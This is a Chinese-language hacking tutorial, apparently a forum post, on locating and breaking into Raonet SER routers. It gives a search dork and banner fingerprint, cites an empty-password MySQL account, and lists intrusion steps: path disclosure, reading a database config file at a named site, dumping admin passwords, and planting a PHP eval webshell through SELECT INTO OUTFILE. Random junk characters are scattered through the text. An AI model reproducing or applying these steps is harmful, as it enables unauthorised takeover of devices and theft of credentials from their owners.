寻找存在漏洞的路由器方法:/ a+ j1 A$ p( ^9 y3 q
; y: M' J) L, A" n1:google搜索'Raonet Subscriber Ethernet Router'
5 L9 a: v3 q4 ]+ H
' r! u' V" F0 p7 {8 D2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20014 P1 m9 u, i4 V6 O/ J3 Q
/ [1 o/ e' o4 p) h+ Q( p; P
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
8 }+ X* J7 b( c2 h: |: }; `, i/ `! ]# Q+ ~
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
7 G5 S- ?2 _) {) ?; t _
: X8 y; \- V# O8 k6 {
5 \$ g* b _. q% x* I% Y
6 i! W/ b4 c. D8 K2 ^入侵步骤:8 J, X8 g6 q' f% x$ O/ I" T C
1 |, q# e( x: [5 j. Z
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php* R; k& C0 ^8 T: i, t, ]5 ]
9 C. x9 A7 i! \3 q) Q! P2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
8 p' N( `# m3 [4 A9 n3:得到密码后连接,查看GUI管理密码:
, a3 R: O5 m J6 m' ^5 O+ h4 Huse ser_500
; L9 g9 g5 g' x0 V, s0 [5 N3 ?select id,passwd from user;
3 v$ F8 K5 b2 g1 U4:通过数据库写入webshell,执行命令:! P. j1 x9 c [# |& D0 f
use mysql;
+ w4 k/ @- K+ T0 k$ \0 ?; V# K8 Icreate table ok(cmd TEXT);
v! }6 |6 @, W2 U/ cinsert into ok values("<?php @eval($_POST[cmd])?>");
$ O/ E1 M6 e1 h) }8 e- Zselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
6 W8 F, i- o, J ~5 Xdrop table ok;* d) @, t ?2 A1 F0 P
) D# \4 p& s d! [
5:连接后门shell.php . U! Q4 Y7 {" s' i. Y
" t9 J4 r, k* i8 p. ?, `0 d% T6. 搞定!' x3 V: Y' }" @! Q$ X8 N
4 T8 A% M' v5 `7 ?' _ |